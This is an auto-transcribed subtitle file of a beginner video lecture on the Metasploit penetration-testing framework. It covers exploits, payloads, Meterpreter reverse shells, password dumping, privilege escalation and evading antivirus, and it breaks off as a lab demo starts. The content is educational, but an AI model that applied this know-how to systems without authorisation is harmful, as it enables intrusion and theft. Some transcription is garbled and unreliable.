All language subtitles for 000 Metasploit Framework.en--- [ FreeCourseWeb.com ] ---
1
00:00:11,940 --> 00:00:14,340
Welcome back to another episode on How to Hack.
2
00:00:14,720 --> 00:00:20,240
So today we'll be discussing Metasploit Framework for beginners and we'll be looking at the architecture
3
00:00:20,390 --> 00:00:22,310
or the framework of Metasploit Framework.
4
00:00:22,550 --> 00:00:27,080
And look at the modules that are available inside Metasploit, as well as exploits and exploitation that
5
00:00:27,080 --> 00:00:28,270
we'll use alongside Metasploit.
6
00:00:28,850 --> 00:00:33,230
And this can really accelerate the pace of how quickly we're performing our penetration testing.
7
00:00:33,230 --> 00:00:38,300
And this can be really useful and helpful, especially when we are trying to understand more about how
8
00:00:38,300 --> 00:00:44,390
we could utilize Metasploit to help us get access into systems, find vulnerabilities, look at exploits
9
00:00:44,390 --> 00:00:45,140
as well as payloads
10
00:00:45,140 --> 00:00:48,470
that are available, as well as, on top of that, post exploitation.
11
00:00:48,470 --> 00:00:50,240
What do we do after we get into the system?
12
00:00:50,240 --> 00:00:51,590
Are we able to dump passwords?
13
00:00:51,890 --> 00:00:54,020
Are we able to get privilege escalation?
14
00:00:54,030 --> 00:00:56,930
So again, all these are key questions that you probably have.
15
00:00:56,930 --> 00:00:58,730
If you have been using Metasploit for a while now.
16
00:01:01,500 --> 00:01:06,210
So what exactly is Metasploit Framework? So Metasploit Framework is a penetration testing platform
17
00:01:06,240 --> 00:01:11,430
that allows us to use different modules, and the modules on the right, you can see a module is a standalone
18
00:01:11,430 --> 00:01:16,980
piece of code that in some or in a lot of ways does not interact with the other modules inside
19
00:01:17,010 --> 00:01:17,670
Metasploit Framework.
20
00:01:17,850 --> 00:01:19,320
So you could do this yourself.
21
00:01:19,320 --> 00:01:24,530
If you look at some of the template guide about coding your own exploit or coding your own modules inside
22
00:01:24,540 --> 00:01:25,360
Metasploit Framework.
23
00:01:25,380 --> 00:01:29,910
So that's a great way to start off with, especially later on when you're trying to program some of these
24
00:01:29,910 --> 00:01:30,450
features.
25
00:01:30,600 --> 00:01:34,380
And we'll definitely be uploading a video about how you could create your own modules.
26
00:01:34,530 --> 00:01:39,570
Look at some of the exploits that you could potentially look at and be able to use and upload or change
27
00:01:39,570 --> 00:01:41,550
some of the code because everything is open source.
28
00:01:41,970 --> 00:01:44,300
So Metasploit Framework has two versions.
29
00:01:44,310 --> 00:01:46,290
One is the pro version.
30
00:01:46,290 --> 00:01:47,370
So you have to pay for that.
31
00:01:47,520 --> 00:01:51,060
And the one that we've been looking at in a lot of tutorials has always been the free one.
32
00:01:51,390 --> 00:01:53,940
And of course, there are some limitations in terms of the free one.
33
00:01:53,970 --> 00:01:58,980
So, again, if you are a full time penetration tester or you're doing a lot of security assessments,
34
00:01:58,980 --> 00:02:01,290
it's highly recommended to go for the paid version.
35
00:02:01,830 --> 00:02:05,170
And of course, if you look at the bottom, we have services of Metasploit.
36
00:02:05,410 --> 00:02:09,660
So, again, if you look at some of the tutorials online, we could see that sometimes people would
37
00:02:09,660 --> 00:02:14,370
have to start up PostgreSQL in order to start running the database services inside Metasploit.
38
00:02:14,430 --> 00:02:19,530
So, again, this could be because Metasploit uses PostgreSQL to actually store all this data.
39
00:02:19,590 --> 00:02:24,030
So, again, you have to start the services before you're able to kick start Metasploit Framework.
40
00:02:26,850 --> 00:02:32,460
So today, we'll cover three key points in the agenda, so first of all, is about Metasploit Framework,
41
00:02:32,460 --> 00:02:33,090
how does it work?
42
00:02:33,360 --> 00:02:37,380
And about the modules that are available for you using Metasploit Framework.
43
00:02:37,390 --> 00:02:42,810
And lastly, how can we scope and define the kind of parameters and options that we want to push into
44
00:02:42,810 --> 00:02:43,320
the system?
45
00:02:45,240 --> 00:02:49,110
So first of all, let's understand three key points as part of Metasploit Framework.
46
00:02:49,230 --> 00:02:51,360
So the very first is vulnerability.
47
00:02:51,600 --> 00:02:56,710
We have to make sure that we want to find our vulnerability inside the system, inside the machine.
48
00:02:56,780 --> 00:02:59,710
We're trying to hack into by using exploits and so on.
49
00:02:59,730 --> 00:03:04,770
So this is the part where we have scanning modules available in Metasploit Framework that we can utilize,
50
00:03:04,950 --> 00:03:05,460
or two.
51
00:03:05,460 --> 00:03:10,770
We could also use other tools like Nmap to find out the service version or the software version that
52
00:03:10,770 --> 00:03:14,460
has those services running, or to find out what kind of services are running in the system.
53
00:03:14,700 --> 00:03:20,010
So, again, if a system is fully patched and has no vulnerability, then we have to start thinking about
54
00:03:20,010 --> 00:03:23,610
zero day potential if we want to craft our exploit inside the system.
55
00:03:23,730 --> 00:03:27,980
So, again, that could be very tedious and cumbersome and could take a really long time to develop.
56
00:03:28,710 --> 00:03:33,540
And of course, the vulnerabilities are basically areas of opportunity through which we can actually hack into
57
00:03:33,540 --> 00:03:33,980
the system.
58
00:03:33,990 --> 00:03:37,860
So vulnerability will be one of the key terms that we must understand.
59
00:03:38,280 --> 00:03:39,990
And number two is in terms of exploit.
60
00:03:39,990 --> 00:03:46,020
So an exploit is what happens when we are able to bypass the security mechanism inside a particular service
61
00:03:46,140 --> 00:03:47,860
or software or operating system.
62
00:03:48,090 --> 00:03:53,670
So, again, this allows us to be able to take control of the system, to control the software or the services
63
00:03:53,670 --> 00:03:57,030
running inside an operating system. And number three is payload.
64
00:03:57,030 --> 00:04:00,600
So payload is what we do after we get into the system?
65
00:04:01,020 --> 00:04:01,850
Do we want a shell?
66
00:04:02,070 --> 00:04:03,650
Do we want it to trigger a shutdown?
67
00:04:03,780 --> 00:04:09,780
So again, payloads come alongside Metasploit mainly as shells to give us control of the system
68
00:04:09,780 --> 00:04:15,980
so that we can do a lot more different kinds of commands, manipulation of the system as part of Metasploit
69
00:04:15,990 --> 00:04:16,560
Framework.
70
00:04:19,250 --> 00:04:23,960
So what are the advantages of using Metasploit Framework compared to, say, using a manual way of trying
71
00:04:23,960 --> 00:04:25,090
to do penetration testing?
72
00:04:25,520 --> 00:04:28,670
So there are five key ways for us to think about in terms of the advantages.
73
00:04:28,850 --> 00:04:35,480
So one is, Metasploit is used a lot in a lot of penetration testing tools, a lot of auditing platforms.
74
00:04:35,720 --> 00:04:41,420
And it is used extensively to test companies for their security posture very, very frequently.
75
00:04:41,420 --> 00:04:46,370
And as such, having a skill set in Metasploit will be very helpful for you, because whenever you're
76
00:04:46,370 --> 00:04:50,510
joining a new team of penetration testers, chances are they have Metasploit Framework running.
77
00:04:50,720 --> 00:04:54,080
And it will be great if you are familiar with it, because some of the interview questions could also
78
00:04:54,080 --> 00:04:55,100
come alongside with that.
79
00:04:55,820 --> 00:04:59,660
And of course, the great thing is that it simplifies complicated or complex tasks.
80
00:04:59,870 --> 00:05:05,330
So complex tasks, meaning that you have a sequence of actions that need to be carried out as part of
81
00:05:05,330 --> 00:05:06,380
your penetration testing.
82
00:05:06,380 --> 00:05:11,600
As such, you could use Metasploit scripts to also automate it for you as much as possible so you
83
00:05:11,600 --> 00:05:14,210
can simplify many of these complex tasks together.
84
00:05:14,420 --> 00:05:19,280
And you can also put a session in the background and use your own scripts to run through and execute inside
85
00:05:19,280 --> 00:05:19,940
a current session.
86
00:05:19,980 --> 00:05:24,980
So, again, a lot of this complexity can be taken out and simplified for the user of Metasploit
87
00:05:24,980 --> 00:05:25,370
Framework.
88
00:05:26,260 --> 00:05:32,080
Number three is in terms of the range of capabilities that you can use along with Metasploit, because
89
00:05:32,080 --> 00:05:34,840
it is built in a old and systematic way.
90
00:05:35,020 --> 00:05:40,720
So you can think of the modules that are available and you have auxiliary scanners and you have exploits
91
00:05:40,720 --> 00:05:42,370
and you have post exploitation.
92
00:05:42,490 --> 00:05:48,190
So all these are really segmented into many different modules, many different in terms of a cyber attack
93
00:05:48,190 --> 00:05:48,560
chain.
94
00:05:48,700 --> 00:05:51,010
How are you trying to work around a system?
95
00:05:51,010 --> 00:05:53,460
So again, all this already of all that for you.
96
00:05:53,470 --> 00:05:59,830
So it's easy for you to visualize where you are in the attack phase, which part of the penetration
97
00:05:59,830 --> 00:06:03,280
testing you're at and what is the next step for you in order to carry them out.
98
00:06:04,000 --> 00:06:05,770
So this is also consistent updates.
99
00:06:05,770 --> 00:06:09,330
You get a lot of updates as you run Metasploit Framework on your system.
100
00:06:09,340 --> 00:06:14,590
So all these updates can help troubleshoot the system, make sure the systems are running fine and making
101
00:06:14,590 --> 00:06:16,390
sure your exploits are working as intended.
102
00:06:16,540 --> 00:06:21,070
So, again, all these updates are great for you, especially in terms of trying to make sure that you
103
00:06:21,070 --> 00:06:23,620
can perform your penetration testing smoothly.
104
00:06:24,700 --> 00:06:28,960
And of course, the great point is there are thousands of modules inside Metasploit Framework.
105
00:06:29,140 --> 00:06:33,160
And this is really helpful because all these functions have been built by many of these penetration
106
00:06:33,160 --> 00:06:33,700
testers.
107
00:06:33,790 --> 00:06:39,310
And you can use them and be able to accelerate how quickly you are performing a penetration testing
108
00:06:39,340 --> 00:06:45,490
and all these tools can help you find out potential vulnerabilities, exploits, as well as payloads,
109
00:06:45,490 --> 00:06:51,190
so that you are able to speed up the pace of how quickly you could get into the system and generate
110
00:06:51,190 --> 00:06:56,950
those reports necessary in order to find out more things about the target entity or the target
111
00:06:56,950 --> 00:06:57,550
enterprise.
112
00:07:00,100 --> 00:07:05,380
So here we've got a screenshot of Metasploit, so whenever you're in Kali Linux or if you have installed it on
113
00:07:05,380 --> 00:07:08,940
your Windows operating system, all you do is enter msfconsole.
114
00:07:09,200 --> 00:07:10,790
You'll be brought into this page.
115
00:07:10,810 --> 00:07:16,270
So here we can see you've got two thousand four exploits, one zero nine auxiliary, three four two post,
116
00:07:16,480 --> 00:07:21,550
five six four payloads, forty-five encoders, 10 nops and seven evasion.
117
00:07:21,560 --> 00:07:24,190
So again, a lot of modules available as part of it.
118
00:07:24,370 --> 00:07:28,840
That could be austinmer of attack as it comes to doing and performing penetration testing.
119
00:07:31,230 --> 00:07:35,640
So one of the key things I really want to share with you as the number one advice when it comes to using
120
00:07:35,640 --> 00:07:39,410
Metasploit Framework is to go into the help wherever you are.
121
00:07:39,780 --> 00:07:41,190
So it is an interactive shell.
122
00:07:41,190 --> 00:07:45,690
So every time you're moving from one shell to another shell or you're moving from one place to another
123
00:07:45,960 --> 00:07:51,000
inside Metasploit Framework, go ahead and enter help. Freely enter help whenever you have the chance to.
124
00:07:51,120 --> 00:07:56,160
And you can see all the commands available to you that you can key in, that you can enter.
125
00:07:56,220 --> 00:08:01,230
And this is really helpful for you to get yourself familiar with the use of Metasploit Framework.
126
00:08:01,500 --> 00:08:06,660
So over here, in this case, we enter help and we can see all the functions and features and commands
127
00:08:06,660 --> 00:08:08,230
that we can use alongside with it.
128
00:08:08,370 --> 00:08:13,110
So this is really helpful in terms of trying to get yourself familiar with Metasploit Framework.
129
00:08:14,900 --> 00:08:20,060
So, of course, now we move on into the exploits. So exploits are ranked. Exploits are ranked in terms of
130
00:08:20,060 --> 00:08:22,910
how good they are to actually go after the system.
131
00:08:22,920 --> 00:08:27,440
So we got a ranking of excellent, great, good, normal, average, low and manual.
132
00:08:27,890 --> 00:08:32,480
So, of course, the best option to choose from will be excellent ranking because that entry to the
133
00:08:32,480 --> 00:08:37,730
system doesn't crash, because if the system crashes, then that could actually alert system administrators.
134
00:08:37,890 --> 00:08:42,280
And if you're doing penetration testing on production systems, this is highly dangerous.
135
00:08:42,440 --> 00:08:48,230
In fact, most of the time you should always go after penetration testing on the environment or where
136
00:08:48,230 --> 00:08:54,770
the systems are actually mirrored to a separate lab test or a virtual setup where you could actually mimic
137
00:08:54,950 --> 00:08:58,090
a real-life production environment and be able to do all this testing on.
138
00:08:58,100 --> 00:09:02,200
So that'll be the number one advice for whenever we're doing penetration testing.
139
00:09:02,600 --> 00:09:04,550
So of course, we got the different kinds of rankings.
140
00:09:04,550 --> 00:09:10,100
So we have to choose wisely what we want to use when it comes to executing many of these payloads.
141
00:09:12,150 --> 00:09:17,340
So over here, when you do a search on exploit or you want to show exploits, it will show you the thousands
142
00:09:17,340 --> 00:09:18,560
of exploits available.
143
00:09:18,570 --> 00:09:21,490
And of course, the first one we can look at is the ID number.
144
00:09:21,510 --> 00:09:27,120
So that number starts from one. For example, I can see from one all the way to two one, and we can
145
00:09:27,120 --> 00:09:30,060
see the Windows, which we understand is for the Windows operating system.
146
00:09:30,070 --> 00:09:34,620
So again, it could be Unix, it could be any other type of Android device as well.
147
00:09:34,630 --> 00:09:39,460
So depending on the operating system, followed by the service on top of the operating system and from
148
00:09:39,460 --> 00:09:42,740
the service, followed by the service type or service version.
149
00:09:42,750 --> 00:09:44,360
So that could be very software driven.
150
00:09:44,640 --> 00:09:50,160
So let's say, for example, you're using Windows, so it could be a directory, could be EasyFTP.
151
00:09:50,520 --> 00:09:55,890
And of course, followed by the date, the date when the CVE (common vulnerability exposure) was released,
152
00:09:56,130 --> 00:09:58,270
followed by the ranking of the exploit.
153
00:09:58,560 --> 00:09:58,880
Yes.
154
00:09:58,890 --> 00:09:59,180
No.
155
00:09:59,190 --> 00:10:05,160
And the final one is actually on the version number of the particular exploit.
156
00:10:08,650 --> 00:10:13,720
So over here, of course, we can show options whenever we are inside Metasploit Framework.
157
00:10:13,750 --> 00:10:19,060
So once you have selected, with use, that particular exploit, payload or any of those modules, you can
158
00:10:19,060 --> 00:10:19,750
enter show options.
159
00:10:19,770 --> 00:10:25,330
So show options will show you the parameters that are needed in order to execute this particular module.
160
00:10:25,630 --> 00:10:30,070
So in this case, we're using Windows SMB MS17-010.
161
00:10:31,480 --> 00:10:36,610
So in this case, we got RHOST, we got DG Treys, we got like a Tab's down pipe and so on.
162
00:10:36,640 --> 00:10:41,840
So, again, of all these, some of them, if you see under the third column, are required.
163
00:10:42,100 --> 00:10:49,300
So required means it's compulsory: it's a value that you must specify in order to use that particular module.
164
00:10:49,450 --> 00:10:54,160
And of course, on the right side, we have the description about the module and here all the description
165
00:10:54,160 --> 00:10:55,790
about the parameters and the options that you have.
166
00:10:55,930 --> 00:10:57,130
So, again, very important.
167
00:10:57,130 --> 00:11:02,690
If you need any help, go ahead and enter help, really, to understand more about the module and all the commands
168
00:11:02,690 --> 00:11:05,200
that are available for you to use as part of the module.
169
00:11:07,680 --> 00:11:11,880
Of course, this would bring us into the payload, so what happens after you exploit the system?
170
00:11:12,240 --> 00:11:14,490
You want to execute something. What do you want to execute?
171
00:11:14,490 --> 00:11:17,550
Most of the time, a payload and a payload is usually a shell.
172
00:11:17,790 --> 00:11:19,980
So, again, there are a number of shells that we can choose from.
173
00:11:20,160 --> 00:11:25,580
So you see in the background, we have Windows, which is the operating system type, x64 architecture,
174
00:11:25,590 --> 00:11:26,610
the platform architecture.
175
00:11:26,880 --> 00:11:30,270
And then of course, we got shell and we got Meterpreter.
176
00:11:30,270 --> 00:11:34,680
The most popular one of all, because it gives us a lot of capabilities in terms of penetration testing,
177
00:11:34,950 --> 00:11:38,160
while we can also go and get a normal shell of Windows.
178
00:11:38,380 --> 00:11:43,440
Again, this is depending on the kind of privileges you're going to get or you think that you're going
179
00:11:43,440 --> 00:11:45,600
to get as part of your penetration testing.
180
00:11:45,810 --> 00:11:48,900
But the most preferred, of course, is Meterpreter, but, of course, Meterpreter
181
00:11:48,900 --> 00:11:54,780
also has some of these potential items that could be detected by antivirus systems or endpoint detection
182
00:11:54,780 --> 00:11:55,740
and response systems.
183
00:11:56,040 --> 00:12:01,200
So, again, all this choosing, the selection of the payload, is very important as part of penetration
184
00:12:01,200 --> 00:12:07,530
testing, especially if you're trying to penetrate into systems that are highly updated.
185
00:12:07,560 --> 00:12:11,430
So, again, all these are things that you want to keep in mind when you're selecting the kind of payloads
186
00:12:11,430 --> 00:12:12,300
to go into.
187
00:12:14,110 --> 00:12:14,740
So here we go.
188
00:12:15,250 --> 00:12:20,710
Also, Meterpreter is a great way in terms of exploiting a system, getting the payload, which has
189
00:12:20,710 --> 00:12:24,410
a lot of functions and features in terms of post exploitation as well as exploitation.
190
00:12:24,850 --> 00:12:31,540
So in terms of privilege escalation, uploading, downloading of files, etc., so a great way, especially
191
00:12:31,540 --> 00:12:36,850
in terms of running many different kind of modules, especially when it comes to penetration testing.
192
00:12:37,150 --> 00:12:40,980
So it's one of the most preferred shells, if you could get it, without detection.
193
00:12:41,320 --> 00:12:46,130
So again, this will be a great way for you to actually try out many of these different commands.
194
00:12:46,270 --> 00:12:51,100
So, again, as advised, enter help the moment you're in a session, and this could actually show all the
195
00:12:51,100 --> 00:12:52,720
features and commands that you want to see.
196
00:12:52,960 --> 00:12:57,250
And from there on, you'll be able to find out things that you can do further and things that you could
197
00:12:57,250 --> 00:12:58,090
be limited to.
198
00:12:58,270 --> 00:13:01,870
And you have to background the session and be able to run all those post exploitation.
199
00:13:03,800 --> 00:13:05,880
So, of course, this will bring us to post exploitation.
200
00:13:05,900 --> 00:13:08,940
So the question is always, now, after exploiting the system,
201
00:13:09,380 --> 00:13:09,930
What's next?
202
00:13:10,040 --> 00:13:10,930
What do I do next?
203
00:13:11,030 --> 00:13:12,160
How do I get passwords?
204
00:13:12,260 --> 00:13:13,490
How do I get persistence?
205
00:13:13,820 --> 00:13:19,010
So, again, there are a lot of post exploitation modules available inside Metasploit Framework that can
206
00:13:19,130 --> 00:13:20,360
help you in that way.
207
00:13:20,570 --> 00:13:24,100
So, of course, as you attack into a target organization,
208
00:13:24,560 --> 00:13:27,170
You want to pivot from one machine to another machine.
209
00:13:27,260 --> 00:13:29,480
You want to do scanning on the environment.
210
00:13:29,690 --> 00:13:33,290
You want to find out what protocols they're using, what servers they have, what services they have
211
00:13:33,290 --> 00:13:34,280
on top of those servers.
212
00:13:34,860 --> 00:13:40,850
So, again, all these are capable of helping you actually expand the scope of your exploitation.
213
00:13:43,610 --> 00:13:45,240
So here we've got post Windows exploits.
214
00:13:45,320 --> 00:13:50,780
So, of course, you can actually do a search on post and we can actually see all the modules available
215
00:13:50,780 --> 00:13:52,150
as part of post exploitation.
216
00:13:52,180 --> 00:13:56,690
We got privilege escalation and we got dumping out of data, dumping of passwords.
217
00:13:56,710 --> 00:13:59,600
So, again, all these are there for us to take a look at.
218
00:13:59,610 --> 00:14:03,950
So especially when we go into tutorial later, we can actually see many of these modules and see how
219
00:14:03,950 --> 00:14:07,540
they function and work and what kind of data we can actually pull out from the system.
220
00:14:08,000 --> 00:14:12,980
So directly from the screenshot we could see, we could look at post Windows manage webcam, we can
221
00:14:12,980 --> 00:14:16,240
look at resolving IP addresses, we can look at wireless list.
222
00:14:16,250 --> 00:14:21,050
So again, all these are some of the post exploitation modules we could be using in order to find out more
223
00:14:21,050 --> 00:14:26,750
information about a system, trying to get privilege escalation. Again, many different items and features
224
00:14:26,750 --> 00:14:27,740
that we can look into.
225
00:14:30,030 --> 00:14:34,950
So there are also a lot of auxiliary modules available as part of Metasploit Framework, so in this
226
00:14:34,950 --> 00:14:39,360
case, on the right side, we have admin, we got crawlers, we got scanners and we got fuzzers.
227
00:14:39,570 --> 00:14:44,970
So when you go into Metasploit Framework, you can search for auxiliary and you can see all these modules
228
00:14:44,970 --> 00:14:47,310
available or all these subcategories available.
229
00:14:47,310 --> 00:14:51,900
So there are a lot more subcategories that you can look at that may be outside of scope of today's lecture.
230
00:14:51,930 --> 00:14:53,880
So, again, do explore them whenever you have the
231
00:14:53,880 --> 00:14:54,420
time to.
232
00:14:56,160 --> 00:15:01,080
So, of course, the first one is the crawler, so the crawler actually allows us to crawl into the system,
233
00:15:01,080 --> 00:15:07,710
so it allows us to crawl through web application servers, allows us to find out subdirectories, do a crawl
234
00:15:07,710 --> 00:15:12,780
into the system, like how web crawlers are deployed from search engines, and it'll go into the site deeply,
235
00:15:13,050 --> 00:15:18,000
finding out things that may accidentally be exposed as publicly available information.
236
00:15:18,360 --> 00:15:23,490
So, again, we can use the MSF crawler on that and that can help us crawl into the web server and find
237
00:15:23,490 --> 00:15:24,690
out all this information.
238
00:15:26,650 --> 00:15:31,390
And of course, we also got a scanner, so scanners help us scan that particular service, whether it's
239
00:15:31,390 --> 00:15:34,820
available, whether it is vulnerable to different kinds of exploits.
240
00:15:35,050 --> 00:15:40,120
So we have done a number of tutorials about using auxiliary scanners where we scan the Windows 10 operating
241
00:15:40,120 --> 00:15:43,210
system to see if it was vulnerable to EternalBlue.
242
00:15:43,360 --> 00:15:47,560
So, again, that could be the first step you take before you run the exploit, because if the system
243
00:15:47,710 --> 00:15:50,440
is not vulnerable, then you will not be able to exploit it.
244
00:15:50,530 --> 00:15:55,540
And then you have to start scanning for other items inside a target machine before you're able to run,
245
00:15:55,540 --> 00:15:56,170
your exploit.
246
00:15:58,950 --> 00:16:04,650
So, of course, we have fuzzing. So we uploaded a new video on SQL injection that was a full tutorial
247
00:16:04,650 --> 00:16:04,970
on that.
248
00:16:04,980 --> 00:16:06,130
So that was really interesting.
249
00:16:06,570 --> 00:16:11,100
So it's fairly similar in the sense that we are trying to fuzz the services of the system.
250
00:16:11,100 --> 00:16:17,520
We're trying to inject code into the system to break it, to get past the buffer and be able to inject
251
00:16:17,520 --> 00:16:18,590
things into the system.
252
00:16:18,600 --> 00:16:20,340
So we're trying to find software bugs.
253
00:16:20,640 --> 00:16:26,460
So in this case, as part of the auxiliary modules of fuzzing inside Metasploit Framework, we got support
254
00:16:26,460 --> 00:16:27,510
for different protocols.
255
00:16:27,520 --> 00:16:30,280
So we got DNS, FTP and so on.
256
00:16:30,510 --> 00:16:37,170
So again, all these are ways and areas where we can try to push and inject code into those services
257
00:16:37,260 --> 00:16:40,850
to see whether we can actually find vulnerabilities inside a system.
258
00:16:40,860 --> 00:16:46,410
So a lot more manual effort in terms of checking those systems or services for vulnerabilities.
259
00:16:48,520 --> 00:16:53,470
So, of course, before we go into the tutorial, the most important question right now you have in your
260
00:16:53,470 --> 00:16:56,940
mind is how can we write our own exploit in Metasploit Framework?
261
00:16:56,950 --> 00:16:59,950
So again, we are going to cover it in a subsequent tutorial.
262
00:16:59,970 --> 00:17:01,030
So stay tuned for that.
263
00:17:01,420 --> 00:17:05,780
So for now, let us go into the tutorial of going through Metasploit Framework.
264
00:17:06,190 --> 00:17:11,410
So on the left side of the screen we have Kali Linux running, and all you got to do is actually click on the terminal
265
00:17:11,410 --> 00:17:13,960
emulator and we can actually zoom in a little.
266
00:17:13,960 --> 00:17:15,100
So it's easier for you to see.
267
00:17:15,490 --> 00:17:18,020
So I can actually go in and enter msfconsole.
268
00:17:18,310 --> 00:17:22,630
So this will start up Metasploit Framework immediately, just like what we see on the lecture
269
00:17:22,630 --> 00:17:22,980
slide.
270
00:17:23,890 --> 00:17:25,000
So here on the lecture slide,
271
00:17:25,000 --> 00:17:27,450
we can see that we actually key in msfconsole.
272
00:17:27,730 --> 00:17:30,960
So over here we are starting the Metasploit Framework console.
273
00:17:31,300 --> 00:17:35,850
So once we're in, we'll be able to see, number one, the number of exploits, auxiliary modules,
274
00:17:36,130 --> 00:17:39,550
post exploitation, payloads, encoders and nops as well.
275
00:17:39,550 --> 00:17:40,400
Seven, evasion.
276
00:17:41,050 --> 00:17:43,880
So now once we're in, all you got to do is enter help.
277
00:17:43,990 --> 00:17:47,260
So when you enter help, it will show you all the commands available.
278
00:17:47,270 --> 00:17:53,680
So again, wherever you are in the interactive shell, it's great if you have the ability to go into
279
00:17:53,680 --> 00:17:59,260
the help page or help command and it will show you all the parameters and all the commands that you
280
00:17:59,260 --> 00:18:01,070
can actually key in into the system.
281
00:18:01,270 --> 00:18:05,860
So this is a great way to actually explore and begin exploring Metasploit Framework.
282
00:18:05,860 --> 00:18:08,680
So a very important way to understand more about exploiting.
283
00:18:09,820 --> 00:18:14,350
So, of course, as demonstrated on the lecture slide, we'll be looking also, of course, at some
284
00:18:14,350 --> 00:18:20,590
other key areas in terms of exploits, so you can actually enter show followed by exploits and you hit
285
00:18:20,590 --> 00:18:21,220
enter on that.
286
00:18:21,430 --> 00:18:26,950
So if you enter show and if you do a double tab on the keyboard, it will show all the options that you
287
00:18:26,950 --> 00:18:28,000
have as part of show.
288
00:18:28,270 --> 00:18:32,760
So here when you see show, there's show all, show auxiliary, encoders and so on.
289
00:18:33,070 --> 00:18:36,240
So of course we can enter show, for example, on exploits.
290
00:18:36,550 --> 00:18:40,390
So this would actually show and pull out all the exploits from the database.
291
00:18:40,540 --> 00:18:44,240
And it will show you what exploits are available as part of Metasploit Framework.
292
00:18:44,620 --> 00:18:48,760
So when I hit enter, this could take some time to load because it's trying to pull all this data
293
00:18:48,760 --> 00:18:49,750
out from the database.
294
00:18:49,900 --> 00:18:52,420
So it may take a little while for the query to complete.
295
00:18:53,110 --> 00:18:59,170
So of course, likewise you could see show all; you could enter show auxiliary and exploits, nops,
296
00:18:59,410 --> 00:19:01,300
show options, payloads and so on.
297
00:19:01,330 --> 00:19:06,460
So again, a very important way for us to understand about how we could actually see all the modules
298
00:19:06,460 --> 00:19:07,210
inside the system.
299
00:19:07,210 --> 00:19:11,770
So show is one of those commands that you will use extensively to actually find out modules that you
300
00:19:11,770 --> 00:19:12,600
can look out for.
301
00:19:13,270 --> 00:19:16,250
And another option that we have is also in terms of searching.
302
00:19:16,630 --> 00:19:21,070
So in terms of searching, we can also search specifically, we can search for any keywords, just like
303
00:19:21,070 --> 00:19:26,080
how you use any search engine, so you can enter search, followed by the type of payload that you
304
00:19:26,080 --> 00:19:26,860
could be looking for.
305
00:19:27,190 --> 00:19:33,250
You could be looking for anything, perhaps, for example, related to Android or anything, for example, related
306
00:19:33,250 --> 00:19:33,880
to Apache.
307
00:19:34,060 --> 00:19:39,390
So, again, all these are things that you can actually look for as you are using Metasploit Framework.
308
00:19:39,640 --> 00:19:41,710
So, of course, in this case, we're still waiting for this show.
309
00:19:42,080 --> 00:19:43,600
So now we have to return.
310
00:19:43,630 --> 00:19:48,760
So if you remember earlier from the lecture, right over here on the right side, we have different kinds
311
00:19:48,760 --> 00:19:49,820
of ratings.
312
00:19:49,820 --> 00:19:50,350
So ranking.
313
00:19:50,350 --> 00:19:55,930
So we got the rankings of excellent, great, good, normal, average, low and manual.
314
00:19:56,260 --> 00:20:01,330
So in this case, when you enter show exploits, we can see normal, average, manual.
315
00:20:01,330 --> 00:20:01,780
Great.
316
00:20:02,050 --> 00:20:04,540
And maybe you're looking for excellent over here, like this.
317
00:20:04,540 --> 00:20:05,550
We can see it over here.
318
00:20:05,950 --> 00:20:10,090
So again, we are able to see all the module information as part of it.
319
00:20:10,840 --> 00:20:12,940
So, of course, moving back, we can enter.
320
00:20:12,940 --> 00:20:13,420
search as
321
00:20:13,420 --> 00:20:13,810
well.
322
00:20:13,810 --> 00:20:17,320
And perhaps you want to search for Android so you can search on that.
323
00:20:17,320 --> 00:20:20,220
And it will show you all the different modules available.
324
00:20:20,230 --> 00:20:25,500
So if you scroll all the way up, it's actually over here; we can see auxiliary as the type of modules
325
00:20:25,510 --> 00:20:26,350
we're looking for.
326
00:20:26,380 --> 00:20:29,290
And now we have admin, Android, Google Play Store.
327
00:20:29,650 --> 00:20:32,920
And of course, we got a ranking, disclosure date, as a CSV exploit.
328
00:20:33,370 --> 00:20:36,540
And of course, on the right side, we have a description of the particular module.
329
00:20:37,150 --> 00:20:41,080
So as you scroll down, we can see the different kinds of auxiliary modules that are available for you to
330
00:20:41,080 --> 00:20:41,480
use.
331
00:20:41,710 --> 00:20:46,090
So we have gather, we have gather, we got a scanner again, we got a server.
332
00:20:46,630 --> 00:20:50,950
And of course, as you scroll down, we have exploit, exploit followed by the operating system type.
333
00:20:51,370 --> 00:20:56,410
And then the major category followed by the subcategory or the name of the particular service that
334
00:20:56,410 --> 00:20:57,470
we're exploiting into.
335
00:20:57,730 --> 00:20:59,740
So here we got the Android Debug Bridge.
336
00:20:59,740 --> 00:21:06,040
So we actually showed Android Debug Bridge in the past few videos, about how we could actually be able to exploit
337
00:21:06,040 --> 00:21:06,190
them.
338
00:21:06,220 --> 00:21:08,020
So, again, really, really useful on that.
339
00:21:08,380 --> 00:21:14,410
So, Stagefright MP4, so this is a way for actually the user to execute an MP4 video file
340
00:21:14,620 --> 00:21:16,340
and you gain complete control of the system.
341
00:21:16,660 --> 00:21:20,560
So again, many exploits for us to actually try and test out on.
342
00:21:20,770 --> 00:21:24,250
It's a great way for us to understand more about a system or operating system in question.
343
00:21:24,640 --> 00:21:26,260
And of course, we've got different kinds of payloads.
344
00:21:26,950 --> 00:21:28,840
So payloads are basically giving us a shell.
345
00:21:29,080 --> 00:21:31,030
So we got a normal Android shell.
346
00:21:31,030 --> 00:21:34,030
And of course, we also got Meterpreter shell over here that you can see.
347
00:21:34,030 --> 00:21:37,640
So reverse TCP, reverse HTTPS.
348
00:21:37,930 --> 00:21:41,050
And of course we've got post exploitation as part of the operating system.
349
00:21:41,050 --> 00:21:44,710
So we've got post Android gather, trying to dump all hash values.
350
00:21:45,160 --> 00:21:47,020
We're trying to get some information.
351
00:21:47,140 --> 00:21:51,460
We are trying to get wireless access point information, so again, also not a great one, removing
352
00:21:51,460 --> 00:21:53,500
a lock from the remote device lock.
353
00:21:53,540 --> 00:21:58,300
So, again, many different post-exploitation modules that we can look at as part of Metasploit Framework.
354
00:21:59,920 --> 00:22:04,660
So moving forward, of course, we have seen all of the exploits and of course, over here we can also
355
00:22:04,660 --> 00:22:05,740
use exploits.
356
00:22:06,070 --> 00:22:10,870
So in this case, I actually have a Windows operating system running over here so I can enter CMD.
357
00:22:10,900 --> 00:22:16,630
So this will show us the IP configuration of this particular operating system.
358
00:22:16,630 --> 00:22:19,400
So we got 192.168.1.89.
359
00:22:19,960 --> 00:22:24,610
So we are going to minimize this, and that is going to be our target machine, and we're going to use
360
00:22:24,610 --> 00:22:27,060
Metasploit here to try to gain access into the system.
361
00:22:27,580 --> 00:22:32,710
